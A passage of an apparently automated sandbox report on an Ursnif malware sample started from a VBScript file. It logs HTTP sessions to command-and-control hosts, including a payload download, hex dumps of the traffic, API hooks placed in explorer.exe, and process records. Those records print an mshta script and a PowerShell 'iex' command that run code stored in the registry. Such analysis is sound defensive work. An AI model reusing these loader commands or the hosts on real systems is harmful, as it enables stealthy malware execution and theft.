                                                                                                                                            Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            4192.168.2.34973847.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Nov 20, 2020 13:33:55.434617043 CET756OUTGET /api1/iAJCYcyHod24JwK9k/jIufCEIwS17P/jhvYu_2FkkI/QBl_2BM4T097uF/L2PDj462js5JIy2DrKfuc/n67M2HaktlcaJNbk/U5tmJV6FXYX9PYl/NoP4iCo0t3EEcSsTSD/GIKj7owQS/L_2F_2FDnVHC9KBZdZNo/37VIl0kIhqLuACLVIYX/V6vuh2W221NYLx6qfGiDKK/3s1hbscFurS3Z/Dxw7EJ3l/t2p9Z6brZ2tKJpChrU45Kjr/cjfC3DPjSn/RRT9C0xUE0vR_0A_0/Dfm26RmoxVkl/LnqMa8E23Vi/NuAD37gXc5rJtP/C2npqShAXAGl_2BaAJYmK/pi0zzpwPl/ghuK HTTP/1.1
                                                                                                                                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                            Accept-Language: en-US
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            Host: api10.laptok.at
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 20, 2020 13:33:56.368752956 CET758INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Fri, 20 Nov 2020 12:33:56 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Content-Encoding: gzip
                                                                                                                                            Data Raw: 37 34 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d d4 c5 91 85 00 00 44 c1 80 38 60 1f 3b e2 ee ce 0d 77 77 a2 df cd 60 aa de 54 17 39 a6 bf 1d fc 45 c4 ad c1 78 3a f9 8f 6a 67 1f 64 f9 66 90 e4 79 86 9a 61 8e a8 a9 8f 01 91 00 eb 9b 2d b4 18 13 10 47 fc 10 4c 70 24 9e d1 b5 ca af b2 26 d0 95 00 5c 5b 74 73 a0 be 17 b2 24 ee 2a 72 78 38 4a cf 87 38 7d 37 a1 47 dd 14 84 56 98 a6 cd d6 1d 52 e9 a4 7b 13 64 a7 3d de 19 9a bd 18 09 50 d9 8c 15 6b 43 8b 91 21 04 17 c2 d5 fb 96 1b e4 81 f6 05 39 58 62 e9 a7 4c 7b de 8f d2 89 1e 56 39 2e 94 20 42 8e ee f8 5a a6 0a 9e 8a 92 04 f3 e4 a0 3a 3a 5c 7b 5d 0e df 6b 60 f1 2c ef 20 8c aa 9a 50 e1 01 5f f5 24 9a 9b e9 e3 9a 32 01 1a f3 a7 84 7e 11 c3 22 ce 62 9e 4f 4c a2 01 b3 9f f4 d0 0f b5 7d 39 40 14 cc a6 f3 92 be 45 60 23 18 f7 94 b0 58 ec 4c 2a d7 b6 61 ff ad 21 ba 1a 61 14 f9 08 5a 4c 97 39 cd d8 8f e7 71 65 12 ee a5 43 53 02 eb 67 14 cc 06 9a 7b ae 12 f8 b8 96 a7 57 2e bb 02 4d a1 27 c4 e5 f9 37 93 57 5b 04 72 b8 f1 cb 1f a7 13 2b 5e c4 f8 ed 39 a9 42 01 fd 86 08 e9 0a a9 dd c3 2d 15 9d 7e a0 42 94 4e 8e 0a 24 3e 9a be 5f 35 4d 02 ac 79 03 82 c9 45 99 fc e9 67 fc 39 8e b3 2e 3a 65 db 3b 61 90 f7 59 39 16 f7 c8 7f 41 6d b8 6c 2b 2d 6c 8c 6e 90 06 6e 6c 78 e2 ce 34 3f 29 a9 83 9f 35 74 af cf 58 79 18 75 42 a0 70 cf 62 86 84 88 f7 60 9b ca a4 c7 db 5c ac 6c 40 cb d1 e1 37 8e ac 01 1b 24 b5 05 5c 43 3d 1b 17 18 96 31 2c 67 5b b9 84 0b 33 2f bf ce 7a 35 f3 0b 3b 3d 7a 3a 25 20 c6 8e 4a b9 63 c3 e3 7f 70 bf 4f 49 67 b9 de 92 cf 81 92 cb 0c 67 21 ee f5 56 2b ba 8f 73 e5 eb 07 c4 ec 81 24 aa dc 4e 98 94 a3 4a 47 4a 48 52 98 fc f2 97 9c db b5 c1 29 bd a1 0a 34 f4 73 0e 37 3f f6 73 90 a7 3e c4 48 9b d0 b6 c7 61 d2 82 40 36 01 a5 f9 13 f7 e0 66 70 02 06 0f 6f c8 b4 75 0a a8 c8 f7 52 e9 d0 c6 1c 23 78 8b 63 b0 5f 70 29 9a 8e a1 b1 0f 59 84 9c 97 0e 9d b4 56 95 00 74 01 8b 85 2a ce 1d c2 8c b9 93 9f 6b 47 e3 bc 2d 73 34 ba bf 08 5d 5a b7 bb 41 b7 b1 f2 1c e5 3a 23 e8 5c e7 eb 5f cd cc 6e 42 fb 9d a0 a1 2a e2 af ec 59 ec 0a 85 d0 14 66 20 82 61 5e 44 0f 4d 1a d2 c2 ea 34 df e0 34 27 fc 40 b9 05 49 6a 80 7c 41 f4 c6 fe 95 34 99 be e1 9b 36 e3 a4 ee e9 b9 59 c7 7a 5c f8 af e1 eb f9 40 1a d1 ad 61 dd 6c 58 a0 9e de de 29 bf d9 21 40 0b 27 10 3c 49 17 38 eb aa f8 98 2c 85 08 5f fc f2 75 55 6d d4 b8 bd 72 0b dc d2 f6 7d 47 26 06 1b 48 b7 90 17 bd 81 91 f5 cc 5b 5f 38 92 23 2f 00 57 a5 c0 d4 7e 2d 47 8e ad 72 54 2c 30 72 98 a8 de 34 7f 16 77 4e 4e cf 66 c1 a3 4f f9 ce d0 7a 85 21 96 84 1f 26 18 71 24 bf 0e d5 ed cf cd 3e 3f ea 60 f1 9e 1a dd b1 1b f2 ce 8c 09 ca fd d6 22 3e a2 f4 18 2d db c7 e3 b2 4f 30 cd b9 cf b6 7f 9b bc 01 8e 26 23 42 43 a9 d3 3a d9 f6 97 53 43 43 cc 42 0b e1 6b 0a 98 cd e6 8c 4d 96 c3 d7 fc 1a e4 f3 c8 49 88 cf 24 fb c6 b1 9b ca df 00 49 74 c5 f8 77 2f 08 c6 94 a9 b1 b2 60 d9 b3 78 ab dd 55 c3 8c 44 d7 76 7c 8d 7c 22 56 7c 75 18 cb b1 76 98 92 ab 13 c5 85 1c ff 14 28 85 4c 8d 74 ea a1 81 76 a9 06 09 2e 46 76 0e dd c2 f2 e0 1b 90 fd 55 24 aa 15 33 7f 15 b6 a6 23 cb 35 fe a0 05 ee 20 1a fb d1 37 d1 59 47 06 ef 64 52 1b 9c b3 4d b7 56 ae 4f f4 89 d6 68 43 9f 1c 7d f6 c3 1c 82 83 e1 32 b2 6c a3 c5 50 6a 62 9a e5 9c
                                                                                                                                            Data Ascii: 740D8`;ww`T9Ex:jgdfya-GLp$&\[ts$*rx8J8}7GVR{d=PkC!9XbL{V9. BZ::\{]k`, P_$2~"bOL}9@E`#XL*a!aZL9qeCSg{W.M'7W[r+^9B-~BN$>_5MyEg9.:e;aY9Aml+-lnnlx4?)5tXyuBpb`\l@7$\C=1,g[3/z5;=z:% JcpOIgg!V+s$NJGJHR)4s7?s>Ha@6fpouR#xc_p)YVt*kG-s4]ZA:#\_nB*Yf a^DM44'@Ij|A46Yz\@alX)!@'<I8,_uUmr}G&H[_8#/W~-GrT,0r4wNNfOz!&q$>?`">-O0&#BC:SCCBkMI$Itw/`xUDv||"V|uv(Ltv.FvU$3#5 7YGdRMVOhC}2lPjb


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            5192.168.2.34975047.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Nov 20, 2020 13:34:42.705324888 CET4623OUTGET /jvassets/xI/t64.dat HTTP/1.1
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Host: c56.lepini.at
                                                                                                                                            Nov 20, 2020 13:34:43.357661009 CET4624INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Fri, 20 Nov 2020 12:34:43 GMT
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Content-Length: 138820
                                                                                                                                            Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT
                                                                                                                                            Connection: close
                                                                                                                                            ETag: "5db6b84e-21e44"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1
                                                                                                                                            Data Ascii: E~r[f1pwC|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E*_v[R{MMpq9.8G^j\<*A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2|;GHf.?I63L@+Y*sX'1mcp{_gTyB!n#TCJw.m!@4db|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaX*Sw^BN*g'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_*Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            6192.168.2.34975147.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Nov 20, 2020 13:34:45.442919970 CET4774OUTGET /api1/4hPW9kKqFHoPCbkici7/axeaBmAwInlm_2BMwjoNQF/DBqPIV6fxiDUx/O8IYQJ_2/FHfs18Nkn9y513u4F9SUOJw/kNmy8dvo70/7jCyOgfNyGln8LENF/ErRL2pQStqN1/9Qq_2BuUJKP/_2Fjcn_2BotOm5/cEi3nGid_2FTEjNr_2B_2/FztACtnep14lNaww/g259IbS6qj0nWTz/Gh1DisQwgNRag12JVP/NBztCoN0H/TGOsfxOOicoc9Giue0bG/lBoyH_2B2mbkCnKCsUn/FC1_0A_0D28OMwhi9pqja2/n506RnxvrVDkJ/nlxG9FcdJ_/2Btn0wAIu/7J2m HTTP/1.1
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Pragma: no-cache
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
                                                                                                                                            Host: api3.lepini.at
                                                                                                                                            Nov 20, 2020 13:34:46.738014936 CET4785INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Fri, 20 Nov 2020 12:34:46 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            7192.168.2.34975447.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Nov 20, 2020 13:34:47.078074932 CET4786OUTPOST /api1/6xMlZYDa3EL_2B/rfDjddDO_2BmWIu1P5dft/exMqTkz6IvD2R3CX/ZHfeDoF3fHMArbt/_2FvJp2IQ4IZi8SCWS/gz5OHLXug/fyQYX3fieMX_2FjcAjW8/hzShghlLicWrj3lQfLt/rhQSYVCKzEiMW_2FO85OZQ/XR6_2BLXNmR15/9Qh_2F4q/grWd_2FFp65v_2FIzQ3F6ge/ak2ymGZicE/UE_2FuPPw8_2BZGEv/QsAL_2Bz08MJ/CIkIoxpdM5N/NWEb4k99CP_2B5/mG4eGNV4kLLjNZpk_0A_0/DnyTv6YNSCi2606v/WegLk1STDZJMFeZ/ibnQp1hQgDMJwqC/jc HTTP/1.1
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Pragma: no-cache
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
                                                                                                                                            Content-Length: 2
                                                                                                                                            Host: api3.lepini.at
                                                                                                                                            Nov 20, 2020 13:34:48.278784990 CET4786INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Fri, 20 Nov 2020 12:34:48 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Data Raw: 38 32 0d 0a df 40 11 17 17 4b 90 6a ee 3c 5f 4c 14 08 16 66 92 e8 32 90 a4 05 26 29 0e 77 57 e4 2a 8e 4e 22 c1 43 0e 08 9c 51 bd 96 40 04 87 99 1f 91 3d d4 e0 da c9 22 24 ed 92 50 6c 7b 9b 9c f8 34 fe c0 24 33 33 c0 d6 b1 2c 30 38 a2 b5 19 70 62 93 a5 8e 81 0f 3a 04 e8 07 25 12 cf a2 53 9b 89 0f c3 81 ef a2 87 2f 27 e2 93 f1 02 67 36 d4 02 74 ed a4 30 0e 73 60 a6 38 52 7b f7 ba a4 48 6a 99 e0 4b f7 0d 0a 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 82@Kj<_Lf2&)wW*N"CQ@="$Pl{4$33,08pb:%S/'g6t0s`8R{HjK0


                                                                                                                                            Code Manipulations

                                                                                                                                            User Modules

                                                                                                                                            Hook Summary

                                                                                                                                            Function NameHook TypeActive in Processes
                                                                                                                                            CreateProcessAsUserWEATexplorer.exe
                                                                                                                                            CreateProcessAsUserWINLINEexplorer.exe
                                                                                                                                            CreateProcessWEATexplorer.exe
                                                                                                                                            CreateProcessWINLINEexplorer.exe
                                                                                                                                            CreateProcessAEATexplorer.exe
                                                                                                                                            CreateProcessAINLINEexplorer.exe
                                                                                                                                            api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                                                                                                                                            api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe

                                                                                                                                            Processes

                                                                                                                                            Process: explorer.exe, Module: KERNEL32.DLL
                                                                                                                                            Function NameHook TypeNew Data
                                                                                                                                            CreateProcessAsUserWEAT7FFB70FF521C
                                                                                                                                            CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                                                                            CreateProcessWEAT7FFB70FF5200
                                                                                                                                            CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                                                                            CreateProcessAEAT7FFB70FF520E
                                                                                                                                            CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                                                                            Process: explorer.exe, Module: user32.dll
                                                                                                                                            Function NameHook TypeNew Data
                                                                                                                                            api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFB70FF5200
                                                                                                                                            api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT6105020
                                                                                                                                            Process: explorer.exe, Module: WININET.dll
                                                                                                                                            Function NameHook TypeNew Data
                                                                                                                                            api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFB70FF5200
                                                                                                                                            api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT6105020

                                                                                                                                            Statistics

                                                                                                                                            Behavior

                                                                                                                                            Click to jump to process

                                                                                                                                            System Behavior

                                                                                                                                            Analysis Process: wscript.exe PID: 6732 Parent PID: 3388

                                                                                                                                            General

                                                                                                                                            Start time:13:33:16
                                                                                                                                            Start date:20/11/2020
                                                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0k4Vu1eOEIhU.vbs'
                                                                                                                                            Imagebase:0x7ff6daeb0000
                                                                                                                                            File size:163840 bytes
                                                                                                                                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            Analysis Process: iexplore.exe PID: 6360 Parent PID: 792

                                                                                                                                            General

                                                                                                                                            Start time:13:33:42
                                                                                                                                            Start date:20/11/2020
                                                                                                                                            Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                            Imagebase:0x7ff7f60f0000
                                                                                                                                            File size:823560 bytes
                                                                                                                                            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            Analysis Process: iexplore.exe PID: 6348 Parent PID: 6360

                                                                                                                                            General

                                                                                                                                            Start time:13:33:43
                                                                                                                                            Start date:20/11/2020
                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17410 /prefetch:2
                                                                                                                                            Imagebase:0x1210000
                                                                                                                                            File size:822536 bytes
                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            Analysis Process: iexplore.exe PID: 6240 Parent PID: 6360

                                                                                                                                            General

                                                                                                                                            Start time:13:33:47
                                                                                                                                            Start date:20/11/2020
                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17422 /prefetch:2
                                                                                                                                            Imagebase:0x1210000
                                                                                                                                            File size:822536 bytes
                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            Analysis Process: iexplore.exe PID: 5652 Parent PID: 6360

                                                                                                                                            General

                                                                                                                                            Start time:13:33:53
                                                                                                                                            Start date:20/11/2020
                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17428 /prefetch:2
                                                                                                                                            Imagebase:0x1210000
                                                                                                                                            File size:822536 bytes
                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            Analysis Process: mshta.exe PID: 6112 Parent PID: 3388

                                                                                                                                            General

                                                                                                                                            Start time:13:34:00
                                                                                                                                            Start date:20/11/2020
                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
                                                                                                                                            Imagebase:0x7ff61ad00000
                                                                                                                                            File size:14848 bytes
                                                                                                                                            MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate

                                                                                                                                            Analysis Process: powershell.exe PID: 6356 Parent PID: 6112

                                                                                                                                            General

                                                                                                                                            Start time:13:34:02
                                                                                                                                            Start date:20/11/2020
                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
                                                                                                                                            Imagebase:0x7ff785e30000
                                                                                                                                            File size:447488 bytes
                                                                                                                                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                            Reputation:high

                                                                                                                                            Analysis Process: conhost.exe PID: 4640 Parent PID: 6356

                                                                                                                                            General

                                                                                                                                            Start time:13:34:02
                                                                                                                                            Start date:20/11/2020
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff6b2800000
                                                                                                                                            File size:625664 bytes
                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            Analysis Process: csc.exe PID: 4220 Parent PID: 6356

                                                                                                                                            General

                                                                                                                                            Start time:13:34:13
                                                                                                                                            Start date:20/11/2020
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline'
                                                                                                                                            Imagebase:0x7ff67a530000
                                                                                                                                            File size:2739304 bytes
                                                                                                                                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                            Reputation:moderate

                                                                                                                                            Analysis Process: cvtres.exe PID: 5336 Parent PID: 4220

                                                                                                                                            General

                                                                                                                                            Start time:13:34:14
                                                                                                                                            Start date:20/11/2020
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
